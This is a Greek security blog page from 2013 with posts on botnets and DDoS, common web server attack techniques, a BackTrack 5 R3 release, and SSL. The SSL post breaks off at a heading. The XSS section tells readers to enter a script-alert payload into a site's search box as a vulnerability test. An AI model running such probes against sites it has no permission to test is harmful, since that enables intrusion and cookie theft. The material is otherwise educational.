!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Τετάρτη 30 Ιανουαρίου 2013

Τι είναι τα botnet και πότε ένας υπολογιστής γίνεται "zombie pc"

Σε αυτό το εκπαιδευτικό άρθρο θα προσπαθήσουμε να εξηγήσουμε αναλυτικά τι είναι τα botnets ή αλλιώς τα "ζόμπι pc". Ως botnet ορίζεται ένα δίκτυο υπολογιστών, το οποίο ελέγχεται εξ αποστάσεως από τον λεγόμενο botmaster χωρίς τη γνώση ή την έγκριση των κατόχων των μεμονωμένων υπολογιστών. Οι υπολογιστές που είναι μέλη του δικτύου αυτού ονομάζονται ζόμπι.
Ο botmaster μπορεί να χρησιμοποιεί αυτούς τους υπολογιστές-ζόμπι για διάφορους παράνομους σκοπούς. Καθώς μπορεί να έχει πρόσβαση στον κάθε υπολογιστή-ζόμπι σαν να βρισκόταν ο ίδιος μπροστά σε αυτόν, είναι δυνατή τόσο η πρόσβαση στα αρχεία του συστήματος όσο και η χρήση της σύνδεσης δικτύου του υπολογιστή, χωρίς να το αντιληφθεί ο ιδιοκτήτης του.
Αυτό του δίνει αμέτρητες δυνατότητες. Πέρα από την υποκλοπή δεδομένων, η πρόσβαση στους υπολογιστές-ζόμπι επιτρέπει και την απόκρυψη της ταυτότητας του δράστη, καθώς ως διακομιστής μεσολάβησης χρησιμοποιείται ο υπολογιστής του θύματος. Ανάλογα με το μέγεθος του botnet, ο δράστης μπορεί να αλλάζει σε ορισμένες εξαιρετικές περιπτώσεις τη διεύθυνση IP του ακόμη και ανά δευτερόλεπτο, ώστε να μπορεί να προβαίνει σε παράνομες ενέργειες μέσω των συνδέσεων των θυμάτων του. Επιπλέον, ο εξ αποστάσεως έλεγχος των υπολογιστών εξυπηρετεί ιδανικά τη μετάδοση του κακόβουλου κώδικα bot ή τη μαζική αποστολή spam.

Κατανεμημένες επιθέσεις: Denial of Service Attack


Το μέγεθος ενός τυπικού botnet, που αποτελείται από μερικές εκατοντάδες έως περισσότερες χιλιάδες υπολογιστές-ζόμπι, μπορεί από τον botmaster να όπλο για την εκτέλεση των λεγόμενων επιθέσεων DDoS (Distributed Denial of Service). Στην περίπτωση αυτοί, οι διακομιστές web ή αλληλογραφίας που βρίσκονται στο στόχαστρο "γονατίζουν" υπό το βάρος μαζικών αιτημάτων σύνδεσης. Με τον κατάλληλο αριθμό ζόμπι, ο διακομιστής θα τεθεί εκτός λειτουργίας. Έχουμε αναφερθεί ήδη σε προηγούμενο tutorial τι είναι οι κατανεμημένες επιθέσεις άρνησης υπηρεσίας.

Επίσης δημοφιλής είναι η χρήση των υπολογιστών-ζόμπι ως διακομιστές web ή FTP. Αυτό μπορεί να εξυπηρετεί διάφορους σκοπούς. Αφενός στη διάθεση μολυσμένων τοποθεσιών web με σκοπό την παροχή περαιτέρω πληροφοριών, αφετέρου στη χρήση των συστημάτων ανυποψίαστων θυμάτων για την αποθήκευση πορνογραφίας, πειρατικών αντιγράφων, κ.λπ.
Η διαχείριση και ο συντονισμός των υπολογιστών-ζόμπι, που πιθανόν είναι διασκορπισμένοι ανά την υφήλιο, μπορεί να γίνει με διάφορους τρόπους. Ενώ στα πρώτα botnets χρησιμοποιούνται κεντρικοί διακομιστές εντολών και ελέγχου, σήμερα προτιμώνται όλο και περισσότερο αποκεντρωμένες δομές επικοινωνίας, οι οποίες μοιάζουν με τα γνωστά δίκτυα P2P (Peer-to-Peer). Αυτό κάνει ακόμη δυσκολότερο το κλείσιμο ενός botnet, διότι δεν υπάρχει κεντρικός διακομιστής, του οποίου η απενεργοποίηση θα διέκοπτε τη λειτουργία ολόκληρου του δικτύου. Αντί αυτού όλα τα ζόμπι επικοινωνούν απευθείας μεταξύ τους, γεγονός που προσδίδει στο botnet πολύ μεγαλύτερη σταθερότητα.

Πώς γίνεται η "στρατολόγηση"


Τα botnets μπορούν να στρατολογούν νέα ζόμπι με διάφορους τρόπους. Εκτός από την εξάπλωση μέσω μολυσμένων e-mail, για την ανάπτυξη ενός botnet μπορούν να χρησιμοποιηθούν και τοποθεσίες web των οποίων τον έλεγχο έχουν αναλάβει χάκερς, εκμεταλλευόμενοι κενά ασφαλείας σε λειτουργικά συστήματα ή λογισμικό εφαρμογών, με αποτέλεσμα τη λεγόμενη "drive-by-infection" δηλαδή, μόλυνση με απλή επίσκεψη. Μια απλή επίσκεψη στη μολυσμένη τοποθεσία web αρκεί για τη μετάδοσή της.
Τα botnets έχουν εξελιχθεί σε μια από τις μεγαλύτερες παράνομες πηγές εσόδων στο Internet. Αφενός με τις ποσότητες των δεδομένων που γίνονται λεία στα χέρια επιτηδείων, αφετέρου με την ενοικίαση botnets σε τρίτους με ωριαία ή μηνιαία ή εφάπαξ χρέωση, π.χ. βάσει του αριθμού της αλληλογραφίας spam που αποστέλλεται μέσω του botnet.

Αντιμετώπιση


Για να μην μετατραπεί ένας υπολογιστής σε zombie θα πρέπει οι χρήστες του να προσέχουν ιδιαίτερα τι "κατεβάζουν" (download) από το Διαδίκτυο (λογισμικό, επισυναπτόμενα αρχεία σε μηνύματα ηλεκτρονικού ταχυδρομείου κτλ.) και τα αρχεία που "κατεβάζουν" να ελέγχονται σε πραγματικό χρόνο από κάποιο ενημερωμένο πρόγραμμα προστασίας τόσο από ιούς όσο και από άλλο κακόβουλο λογισμικό. Ένα επιπρόσθετο μέτρο προστασίας που θα πρέπει να ληφθεί είναι η τοποθέτηση τείχους προστασίας (firewall) ανάμεσα στον υπολογιστή και στο Διαδίκτυο. Με τον τρόπο αυτό ελαχιστοποιείται ο κίνδυνος να μολυνθεί ο υπολογιστής από κάποιο κακόβουλο λογισμικό και να χρησιμοποιηθεί από τρίτους για παράνομους σκοπούς.

Τεχνικές επιθέσεων για την παραβίαση ενός Web Server


Σε γενικές γραμμές, είναι αρκετοί αυτοί που γνωρίζουν πώς να χειριστούν, να ρυθμίσουν και να διαχειριστούν έναν εξυπηρετητή ιστού (web server). Όμως, ελάχιστοι είναι αυτοί που ξέρουν πραγματικά πώς να προστατέψουν τους web server τους από τους επίδοξους hackers που παραμονεύουν στο Διαδίκτυο. Στις μέρες μας, πάρα πολλές ιστοσελίδες φιλοξενούνται επί πληρωμή σε εξυπηρετητές ιστού και κατά συνέπεια είναι εξαιρετικά σημαντικό να ασφαλίσετε τον web server σας, προκειμένου να αποφευχθεί η πιθανότητα κλοπής προσωπικών δεδομένων.
Προτού αναφέρουμε τις τεχνικές που χρησιμοποιούν οι hackers για να παραβιάσουν έναν web server, καθώς και τους τρόπους με τους οποίους μπορείτε να προστατευτείτε , θα πρέπει να ξέρετε τι είναι και πώς λειτουργεί ένας εξυπηρετητής ιστού.

 

Τι είναι ένας Web Server;


Πρόκειται για έναν υπολογιστή ή και περισσότερους που χρησιμοποιούνται για να φιλοξενούν ιστοσελίδες. Για να είναι μια ιστοσελίδα διαθέσιμη προς όλους μέσω του Διαδικτύου όλο το εικοσιτετράωρο, θα πρέπει να φιλοξενείται σε έναν Web Server.

Πώς λειτουργεί ένας Web Server;


Ο τρόπος που λειτουργεί ένας Web Server είναι απλός. Όποτε χρησιμοποιείτε έναν περιηγητή διαδικτύου για να επισκεφτείτε μια ιστοσελίδα, ο περιηγητής σας θα ζητήσει τη συγκεκριμένη σελίδα από τον web server και ο εξυπηρετητής θα στείλει πίσω σε σας τη σελίδα που ζητήθηκε.

Πώς γίνονται hacked οι Web Servers;


Υπάρχουν πολλοί λόγοι που οδηγούν στην εύκολη παραβίαση ενός Web Server από έναν hacker. Μερικοί από τους πιο συνηθισμένους είναι η εγκατάσταση ενός Web Server με τις προεπιλεγμένες ρυθμίσεις, χωρίς την εγκατάσταση των τελευταίων ενημερώσεων και χρησιμοποιώντας αδύναμους κωδικούς πρόσβασης. Όταν ένας εξυπηρετητής ιστού παραβιαστεί, τότε ο hacker μπορεί να το χρησιμοποιήσει για να κάνει κακόβουλες πράξεις στο Διαδίκτυο. Για παράδειγμα, οι hacked Web Servers μπορούν να χρησιμοποιηθούν ως ζόμπι-υπολογιστές για την εκτέλεση μιας πιο ισχυρής επίθεσης DDOS.

Τεχνικές για την παραβίαση ενός Web Server

Παρακάτω αναφέρονται μερικές από τις τεχνικές που μπορούν να χρησιμοποιηθούν από hackers για να υποβιβάσουν την ασφάλεια ενός διακομιστή ιστού.

1. Σπάσιμο κωδικών πρόσβασης
Ένας hacker μπορεί να χρησιμοποιήσει αρκετές τεχνικές για να σπάσει έναν κωδικό, όπως Bruteforce, επιθέσεις Dictionary και Rainbow. Όμως, οι συγκεκριμένες επιθέσεις δημιουργούν τεράστια αρχεία καταγραφής που μαρτυρούν την παρουσία μιας εισβολής και από πού προέρχεται. Για το λόγο αυτό, οι έξυπνοι hackers χρησιμοποιούν είτε κάποιον proxy, είτε κάποια άλλη μέθοδο απόκρυψης της IP του υπολογιστή από τον οποίο κάνουν την επίθεση, ή ακόμα επιτίθενται μέσω άλλων συστημάτων που έχουν ήδη παραβιάσει.

2. Επίθεση «Man In The Middle»
Πρόκειται για μια μέθοδο, γνωστή και ως ARP poisoning, που χρησιμοποιούν οι hackers για να υποκλέψουν στοιχεία πρόσβασης σε επίπεδο διαχειριστή.
Σε αυτό το είδος της επίθεσης, ο επιτιθέμενος βρίσκεται στη μέσης της συνομιλίας δυο συμμετεχόντων στο δίκτυο (Γιώργος και Μαρία). Σε μια πραγματική επικοινωνία ο Γιώργος θα λάμβανε μηνύματα από τη Μαρία και η προηγούμενη από το Γιώργο. Ο εισβολέας όμως μπορεί να μιμηθεί καθέναν από τους δυο και να στέλνει μηνύματα τα οποία φαίνεται ότι προήλθαν από την πραγματική τους επικοινωνία Συνήθως τέτοιου είδους επιθέσεις χρησιμοποιούνται για την τροποποίηση μηνυμάτων κατά τη μεταφορά χωρίς να υπάρχει περίπτωση να ανιχνευθούν.

3. Keylogger και Trojan

Αν ένας hacker καταφέρει με κάποιο τρόπο να εγκαταστήσει στον υπολογιστή ενός διαχειριστή ένα trojan ή ένα keylogger, τότε ο κακόβουλος χρήστης μέσω των προγραμμάτων αυτών θα μπορέσει εύκολα να πάρει τα στοιχεία πρόσβασης, και ενδεχομένως κι άλλα ευαίσθητα δεδομένα.

4. Επίθεση DNS Cache Poisoning

Στην περίπτωση που ένας hacker καταφέρει να εισάγει πλαστές εγγραφές για ένα όνομα τομέα (domain name) μέσα στον DNS server και μπορέσει να κάνει τον Web Server να δεχτεί την πλαστή διεύθυνση της εγγραφής, τότε ο επιτιθέμενος μπορεί εύκολα να ελέγξει τον περιηγητή διαδικτύου του θύματος. Αυτή η επίθεση είναι εξαιρετικά επικίνδυνη, διότι συμβαίνει εν αγνοία του χρήστη.


5. XSS (Cross Site Script Attack)
Με τον όρο Cross-site scripting ή XSS αναφερόμαστε στην εκμετάλλευση διάφορων ευπαθειών (vulnerabilities) υπολογιστικών συστημάτων με εισαγωγή κώδικα HTML ή Javascript σε κάποιο ιστοχώρο. Κάποιος κακόβουλος χρήστης, θα μπορούσε να εισάγει κώδικα σε έναν ιστοχώρο, μέσω ενός κειμένου εισόδου για παράδειγμα, ο οποίος αφού δεν θα φιλτραριζόταν από τον ιστοχώρο σωστά, θα μπορούσε να προκαλέσει προβλήματα στον διαχειριστή ή επισκέπτη του ιστοχώρου. παράδειγμα:
Πηγαίνετε στην σελίδα που θέλετε να δοκιμάσετε, και ψάχνετε για ένα "searchbox". Μέσα σε αυτό γράψτε τον κώδικα <script>alert("oti thelete!!!");</script>. Εάν τώρα, ο κώδικας εκτελεστεί (που είναι αυτό που θέλουμε) θα μας ανοίξει η σελίδα μόλις πατήσουμε enter και θα μας πετάξει ένα κουτάκι που θα λέει αυτό που γράψετε μέσα στα εισαγωγικά. Αυτό σημαίνει ότι ο κώδικας που δώσαμε, αντί να κάνει αναζήτηση, κάνει εκτέλεση αυτού, με αποτέλεσμα να εκτελούμε εντολές, σαν να είναι δικό μας το σιτε! Τώρα δηλαδή είμαστε οι διαχειριστές του σιτε; ΟΧΙ! Αυτό που μπορεί να επιτύχει ο κακόβουλος χρήστης θα είναι:

  • Κλοπή κωδικών/λογαριασμών κλπ προσωπικών δεδομένων
  • Αλλαγή ρυθμίσεων του ιστοχώρου
  • Κλοπή των cookies εγγεγραμένων χρηστών και να μπούμε στη σελίδα σαν να ήταν αυτοί.
  • Ψεύτικη διαφήμιση ή άλλιώς deface (μέσω, π.χ., ενός συνδέσμου). Δηλαδή να αντικατασταθεί η τρωτή σε επιθέσεις XSS σελίδα με μια άλλη που έχει φτιάξει ο επιτεθέμενος. Έτσι ο οποιοσδήποτε μπει στη σελίδα θα δεί τη σελίδα του επιτηθέμενου.
6. Remote File Inclusion (R.F.I)
Η μέθοδος αυτή αφορά την εκτέλεση ενός κακόβουλου προγράμματος (για την ακρίβεια ενός webshell) από έναν μη εξουσιοδοτημένο χρήστη, σε μια ευάλωτη σε αυτού του είδους την επίθεση- ιστοσελίδα που φιλοξενείται σε κάποιον server.

7. SQL Injection
Στα SQL injections ένας κακόβουλος χρήστης προσπαθεί να εκμεταλλευτεί την ελλιπή ή λανθασμένη επαλήθευση (validation) των δεδομένων εισόδου (input data) μιας εφαρμογής. Τυπικά η ευπάθεια των SQL injections μπορεί να εμφανίζεται και σε μη web εφαρμογές, όμως εκεί είναι σαφώς πιο σπάνιο. Συνήθεις τρόποι όπου οι χρήστες δίνουν δεδομένα εισόδου σε μια εφαρμογή web είναι οι φόρμες (με τις μεθόδους HTTP GET και POST) και τα links (μέθοδος HTTP GET). Στην περίπτωση ελλιπούς επαλήθευσης των δεδομένων εισόδου είναι σε κάποιες περιπτώσεις δυνατόν να περαστούν extra εντολές SQL προς εκτέλεση στην εφαρμογή ή να αλλαχτούν μέρη μιας επερώτησης SQL με τρόπο που δεν έχει προβλεφθεί.

ΣΗΜΕΙΩΣΗ: Για περισσότερα σχετικά για αυτές τις επιθέσεις θα αναφερθούμε σε άλλα κεφάλαια αναλυτικότερα για την κάθε μια ξεχωριστά.

Η ευπάθεια αναφέρεται στην αδυναμία του συστήματος που υποστηρίζει ο ιστοχώρος να φιλτράρει και να απορρίψει τυχόν επιβλαβείς εισόδους.
Η λίστα με τις τεχνικές που χρησιμοποιούν οι hackers συνεχίζεται, όπως για παράδειγμα είναι η εισβολή FTP Server, η κοινωνική μηχανική, η εκμετάλλευση ευπαθειών των διαδικτυακών εφαρμογών κ.α.
Καταλήγουμε λοιπόν στο συμπέρασμα, ότι κάθε διαχειριστής μιας ιστοσελίδας έχει την ευθύνη για την ασφάλεια του Web Server του. Μερικά από τα βήματα που θα πρέπει να κάνει είναι να ενημερώνεται συνεχώς για τις νέες τεχνικές επιθέσεων, να εγκαθιστά άμεσα τις τελευταίες ενημερώσεις στο διακομιστή ιστού, να χρησιμοποιεί πολύ ισχυρούς κωδικούς πρόσβασης και να είναι πάντα σε εγρήγορση.

Δευτέρα 28 Ιανουαρίου 2013

Δημιουργήστε τα δικά σας Linux

Σε αυτό το tutorial θα σας δείξω πως μπορείτε να φτιάξετε το δικό σας λειτουργικό σύστημα με την εμφάνιση του δικού σας γραφικού περιβάλλοντος που θα επιλέξετε, το σύνολο των εφαρμογών της επιλογής σας και φυσικά να του δώσετε την ονομασία που επιθυμείτε. Το λειτουργικό σύστημα που θα δημιουργήσετε θα πατάει πάνω στα Linux.
Κατ' αρχάς θα πρέπει πρώτα να μπούμε στη σελίδα


Στη συνέχεια θα πρέπει πρώτα να δημιουργήσουμε ένα λογαριασμό στη σελίδα δηλαδή να κάνουμε μια απλή εγγραφή δίνοντας κάποια στοιχεία μας όπως username, password, email κτλ. Μετά αφού εγγραφούμε ακολουθώντας τα βήματα που μας δίνει η σελίδα σιγά σιγά δημιουργούμε τα δικά μας linux. Είναι μια αρκετά απλή και εύκολη διαδικασία καθώς η σελίδα είναι πολύ κατανοητή και φιλική προς το χρήστη έτσι ώστε και ο πιο απλός χρήστης που θα μπει στη σελίδα να μπορεί να φτιάξει τα δικά του linux.
Παρακάτω σας παραθέτω μερικές screenshots της σελίδας susustudio...

 


Σάββατο 26 Ιανουαρίου 2013

BackTrack 5 R3 Released!

H πλέον δημοφιλής διανομή Linux για penetration testing, hacking και forensics έχει όνομα και λέγεται BackTrack 5 R3.
Έμφαση στην πρόσφατη release δίνεται στην επιδιόρθωση προβλημάτων, στην προσθήκη νέων εργαλείων αλλά κι ολόκληρων κατηγοριών, όπως εκείνη με τα εργαλεία για physical exploitation συστημάτων.


Το BackTrack 5 R3 περιλαμβάνει περισσότερα από 60 νέα εργαλεία, πολλά από τα οποία κυκλοφόρησαν για πρώτη φορά φέτος στα πλαίσια των συνεδρίων BlackHat και Defcon, στο Las Vegas. Μεταξύ των νέων κατηγοριών εργαλείων υπάρχει και μία για physical exploitation συστημάτων, στην οποία βρίσκει κανείς εργαλεία και βιβλιοθήκες για το Arduino, καθώς και διάφορα payloads για USB sticks.
Τις διάφορες εκδοχές του BackTrack 5 R3 μπορείτε να κατεβάσετε από εδώ και προτείνουμε τα torrents έναντι των direct downloads.


To BackTrack όπως τα περισσότερα Auditing Live CDs έρχεται με πληθώρα εργαλείων τα οποία οι δημιουργοί έχουν κατηγοριοποιήσει (άλλα Auditing Live CDs μπορεί να χρησιμοποιούν διαφορετική ορολογία):
  • Exploit Archives:
Αυτό περιλαμβάνει συνδέσεις σε βάσεις δεδομένων και sites με λίστες γνωστών προβλήμάτων, αδυναμιών όπως και συνδέσεις σε διορθώσεις (patches).
  • Enumeration:
ΕργαλείαDNS και υπηρεσιών καταλόγου, χρήσιμα στην εξέταση των παρεχόμενων υπηρεσιών που ένα σύστημα ή δίκτυο προσφέρει και στην αποκομιδή πληροφοριών μέσω των υπηρεσιών αυτών.
  • Scanners:
Εργαλεία σαν το NMap που βοηθούν έναν εξεταστή να ανακαλύψει συστήματα σε ένα δίκτυο και να ερευνήσει ένα σύστημα (ή μία ομάδα συστημάτων) για αποκάλυψη ανοιχτών πορτών και γνωστών αδυναμιών.
  • Password Crackers:
Εργαλεία που δεν προορίζονται να παραβιάσουν συστήματα παρά για την ανεύρεση κωδικών χρηστών που είναι εύκολο να παραβιαστούν,
  • Spoofing:
Εργαλεία που επιτρέπουν στο σύστημα του εξεταστή να υποδυθεί διαφορετικά συστήματα και υπηρεσίες για να εξετάσει άλλα συστήματα και υπηρεσίες σε ποικίλες συνθήκες ασφάλειας.
  • Sniffers:
Ευρεία συλλογή εργαλείων που περιλαμβάνει εφαρμογές ανάλυσης δικτύων όπως το WireShark (γνωστότερο και ως Ethereal), αναλυτές πρωτοκόλλων που εξετάζουν πρωτόκολλα υψηλού επιπέδου, και εφαρμογές συλλογής και ανάλυσης επικοινωνίας βάσεων δεδομένων.
  • Εργαλεία WiFi:
Συλλογή εργαλείων network scanners και άλλων εργαλείων για παρακολούθηση, ανάλυση και δοκιμή δικτύων 802.11 αλλά και άλλων WiFi (ασύρματων) δικτύων.
  • BlueTooth:
Παρόμοια εργαλεία με τα προηγούμενα με προορισμό τα δίκτυα και τις υπηρεσίες βασισμένα στην τεχνολογία Bluetooth.
  • Εργαλεία CISCO:
Συλλογή εργαλείων για έρευνα και πρόσβαση σε δρομολογητές CISCO. Eργαλεία βάσεων δεδομένων:Συλλογή εργαλείων που επιτρέπουν την ανάλυση συνδέσεων, και επικοινωνίας μεταξύ των πιο κοινών βάσεων δεδομένων.
  • Εργαλεία σήμανσης
Συλλογή εργαλείων χρήσιμων στην συστηματική καταγραφή των αποτελεσμάτων της εξέτασης ενός συστήματος. Μερικά από τα εργαλεία αυτά αποθηκεύουν τα αποτελέσματα σε βάσεις δεδομένων ενώ μερικά επιτρέπουν την δημιουργία αντιγράφων ασφαλείας ενός δίσκου πριν από την εξέταση προκειμένου να αποφευχθούν προβλήματα.


Το BackTrack περιλαμβάνει και μεγάλο αριθμό servers και άλλων συστημάτων που μπορούν να χρησιμοποιηθούν ως δόλωμα για την επιθεώρηση των μεθόδων που χρησιμοποιούνται εναντίον των οικείων συστημάτων και δικτύων.
Τα Auditing Live CDs μπορούν να χρησιμοποιηθούν σαν εργαλεία έρευνας σε ένα δίκτυο όσον αφορά τις υπηρεσίες και την επικοινωνία, ή ως εργαλεία αξιολόγησης της ασφάλειας ενός συστήματος. Τα δεδομένα που συλλέγονται μπορούν οργανωθούν και να χρησιμοποιηθούν ως πειστήρια σε μία επίσημη εξέταση ή έρευνα άλλου είδους.
Η αποθήκευση των δεδομένων που συλλέγονται γίνεται είτε στο δίκτυο ή τοπικά με τη χρήση ενός USB flash memory drive.

Πρωτόκολλο SSL (Secure Socket Layer)

Γενικά

Το πρωτόκολλο SSL αναπτύχθηκε από την Netscape Communications Corporation για την ασφαλή επικοινωνία ευαίσθητων πληροφοριών όπως προσωπικά στοιχεία και αριθμούς πιστωτικών καρτών. Η πρώτη σχεδίαση του πρωτοκόλλου έγινε τον Ιούλιο του 1994 και αποτελούσε την πρώτη έκδοση (version 1.0) και τον Οκτώβριο του ίδιου χρόνου δημοσιοποιήθηκε υπό την μορφή RFC (Request For Comments). Τον Δεκέμβριο του 1994 εκδίδεται μια επαναθεώρηση του πρωτοκόλλου, η δεύτερη έκδοση του (version 2.0). Η παρούσα έκδοση του SSL, version 3.0, παρουσιάσθηκε στο κοινό στα τέλη του 1995, ενώ από τα μέσα του 1995 είχε αρχίσει να εφαρμόζεται σε προϊόντα της εταιρίας, όπως τον Netscape Navigator.
Επειδή η Netscape επιθυμούσε την παγκόσμια υιοθέτηση του πρωτοκόλλου γεγονός που ερχόταν σε σύγκρουση με τους νόμους των Ηνωμένων Πολιτειών περί εξαγωγή κρυπτογραφικών αλγορίθμων, αναγκάστηκε να επιτρέψει την χρήση ασθενών αλγορίθμων στις εξαγόμενες εφαρμογές. Πιο συγκεκριμένα, δημιούργησε παραλλαγές των αλγόριθμων RC4-128 και RC2-128 που στην πραγματικότητα χρησιμοποιούν κλειδιά των 40 bits

Εισαγωγή στο SSL

Το πρωτόκολλο SSL έχει σχεδιαστεί για να παρέχει απόρρητη επικοινωνία μεταξύ δύο συστημάτων, από τα οποία το ένα λειτουργεί σαν client και το άλλο σαν server. Η εξασφάλιση του απορρήτου γίνεται με την κρυπτογράφηση όλων των μηνυμάτων στο επίπεδο SSL Record Protocol. Παρέχει, επιπλέον, υποχρεωτική πιστοποίηση της ταυτότητας του server και προαιρετικά της ταυτότητας του client, μέσω έγκυρων πιστοποιητικών από έμπιστες Αρχές Έκδοσης Πιστοποιητικών (Certificates Authorities). Υποστηρίζει πληθώρα μηχανισμών κρυπτογράφησης και ψηφιακών υπογραφών για αντιμετώπιση όλων των διαφορετικών αναγκών. Τέλος, εξασφαλίζει την ακεραιότητα των δεδομένων, εφαρμόζοντας την τεχνική των Message Authentication Codes (MACs), ώστε κανείς να μην μπορεί να αλλοιώσει την πληροφορία χωρίς να γίνει αντιληπτός. Όλα τα παραπάνω γίνονται με τρόπο διαφανές και απλό.
Η έκδοση 3 του πρωτοκόλλου κάλυψε πολλές αδυναμίες της δεύτερης. Οι σημαντικότερες αλλαγές έχουν να με την μείωση των απαραίτητων μηνυμάτων κατά το handshake για την εγκαθίδρυση της σύνδεσης, την επιλογή των αλγόριθμων συμπίεσης και κρυπτογράφησης από τον server και την εκ νέου διαπραγμάτευση του master-key και session-id. Ακόμα αυξάνονται οι διαθέσιμοι αλγόριθμοι και προστίθενται νέες τεχνικές για την διαχείριση των κλειδιών.
Συμπερασματικά μπορούμε να πούμε πως η έκδοση 3 του SSL είναι πιο ολοκληρωμένη σχεδιαστικά, με μεγαλύτερο εύρος υποστήριξης εφαρμογών και λιγότερες ατέλειες. Παρ' όλο που είναι συμβατή με την δεύτερη έκδοση, η χρήση της τελευταίας δεν πρέπει να προτιμάται.
Το SSL μπορεί να τοποθετηθεί στην κορυφή οποιουδήποτε πρωτοκόλλου μεταφοράς, δεν εξαρτάται από την ύπαρξη του TCP/IP και τρέχει κάτω από πρωτόκολλα εφαρμογών όπως το HTTP, FTP και TELNET. Μια αναπαράσταση του πρωτοκόλλου SSL βλέπουμε παρακάτω.

Λειτουργία του SSL

SSL Record Protocol



Ένα πακέτο SSL αποτελείται από δύο μέρη, την επικεφαλίδα και τα δεδομένα. Η επικεφαλίδα μπορεί να είναι είτε 3 bytes είτε 2 bytes, από τις οποίες περιπτώσεις η δεύτερη χρησιμοποιείται όταν τα δεδομένα χρειάζονται συμπλήρωμα (padding). Το πεδίο escape-bit στην περίπτωση των 3 bytes υπάρχει μόνο σε εκδόσεις μετά την δεύτερη του πρωτοκόλλου και προβλέπεται για ρύθμιση πληροφοριών out-of-band. Για την επικεφαλίδα των 2 bytes το μέγεθος του πακέτου είναι 32767 bytes, ενώ για την επικεφαλίδα των 3 bytes το μέγεθος είναι 16383 bytes.
Το κομμάτι των δεδομένων αποτελείται από ένα Message Authentication Code (MAC), τα πραγματικά δεδομένα και δεδομένα συμπλήρωσης, εάν χρειάζονται. Αυτό το κομμάτι είναι που κρυπτογραφείται κατά την μετάδοση. Τα συμπληρωματική δεδομένα απαιτούνται όταν οι αλγόριθμοι κρυπτογράφησης εν χρήση είναι τύπου block ciphers και ο ρόλος τους είναι να συμπληρώνουν τα πραγματικά δεδομένα ώστε το μέγεθος τους είναι πολλαπλάσιου του μεγέθους που δέχεται σαν είσοδο ο block cipher. Εάν χρησιμοποιούνται stream ciphers τότε δεν απαιτείται συμπλήρωμα και μπορεί αν χρησιμοποιηθεί η επικεφαλίδα των 2 bytes.
Το MAC είναι η digest ή hash value των secret-write key (βλέπε παρακάτω) του αποστολέα του πακέτου, των πραγματικών δεδομένων, των συμπληρωματικών δεδομένων και ενός αριθμού ακολουθίας, στην σειρά που δίνονται.
Προβλέπεται και η συμπίεση των δεδομένων (data compression) με κατάλληλους μηχανισμούς που επιλέγονται κατά το handshake, ενώ δεν αποκλείεται να χρειαστεί και τεμαχισμός της πληροφορίας σε πολλά πακέτα (fragmentation).

Αντοχή του SSL σε Γνωστές Επιθέσεις

Dictionary Attack

Αυτό το είδος της επίθεσης λειτουργεί όταν ένα μέρος του μη κρυπτογραφημένου κειμένου είναι στην κατοχή του ανέντιμων προσώπων. Το μέρος αυτό κρυπτογραφείται με χρήση κάθε πιθανού κλειδιού και έπειτα ερευνάται ολόκληρο το κρυπτογραφημένο μήνυμα μέχρι να βρεθεί κομμάτι του που να ταιριάζει με κάποιο από τα προϋπολογισμένα. Σε περίπτωση που η έρευνα έχει επιτυχία, τότε το κλειδί που χρησιμοποιήθηκε για την κρυπτογράφηση ολόκληρου του μηνύματος έχει βρεθεί.
Το SSL δεν απειλείται από αυτήν την επίθεση αφού τα κλειδιά των αλγορίθμων του είναι πολύ μεγάλα των 128 bit. Ακόμα και οι αλγόριθμοι σε εξαγόμενα προϊόντα, υποστηρίζουν 128 bit κλειδιά και παρ' όλο που τα 88 bit αυτών μεταδίδονται ανασφάλιστα, ο υπολογισμός 240 διαφορετικών ακολουθιών κάνει την επίθεση αδύνατο να επιτύχει.

Brute Force Attack

Η επίθεση αυτή πραγματοποιείται με την χρήση όλων των πιθανών κλειδιών για την αποκρυπτογράφηση των μηνυμάτων. Όσο πιο μεγάλα σε μήκος είναι τα χρησιμοποιούμενα κλειδιά, τόσο πιο πολλά είναι τα πιθανά κλειδιά. Τέτοια επίθεση σε αλγορίθμους που χρησιμοποιούν κλειδιά των 128 bits είναι τελείως ανούσια. Μόνο ο DES56 bit cipher είναι ευαίσθητος σε αυτήν την επίθεση, αλλά η χρήση του δεν συνιστάται.

Replay Attack

Όταν ένας τρίτος καταγράφει την ανταλλαγή μηνυμάτων μεταξύ client και server και προσπαθεί να ξανά χρησιμοποιήσει τα μηνύματα του client για να αποκτήσει πρόσβαση στον server, έχουμε την επίθεση replay attack. Όμως το SSL κάνει χρήση του connection-id, το οποίο παράγεται από τον server με τυχαίο τρόπο και διαφέρει για κάθε σύνδεση. Έτσι δεν είναι δυνατόν πότε να υπάρχουν δυο ίδια connection-id και το σύνολο των είδη χρησιμοποιημένων μηνυμάτων δεν γίνονται δεκτά από τον server. Το connection-id έχει μέγεθος 128 bit για πρόσθετη ασφάλεια.

Man-In-The-Middle-Attack

Η επίθεση Man-In-The-Middle συμβαίνει όταν ένας τρίτος είναι σε θέση να παρεμβάλλεται στην επικοινωνία μεταξύ του server και του client. Αφού επεξεργαστεί τα μηνύματα του client και τροποποιήσει όπως αυτός επιθυμεί, τα προωθεί στον server. Ομοίως πράττει για τα μηνύματα που προέρχονται από τον server. Δηλαδή, προσποιείται στον client ότι είναι ο server και αντίστροφα.
Το SSL υποχρεώνει τον server να αποδεικνύει την ταυτότητα του με την χρήση έγκυρου πιστοποιητικού του οποίου η τροποποίηση είναι αδύνατον. Μην ξεχνάμε την δυνατότητα επικοινωνίας των κλειδιών υπογεγραμμένα.

Αδυναμίες του SSL

Brute Force Attack Εναντίον Αδύναμων Αλγορίθμων

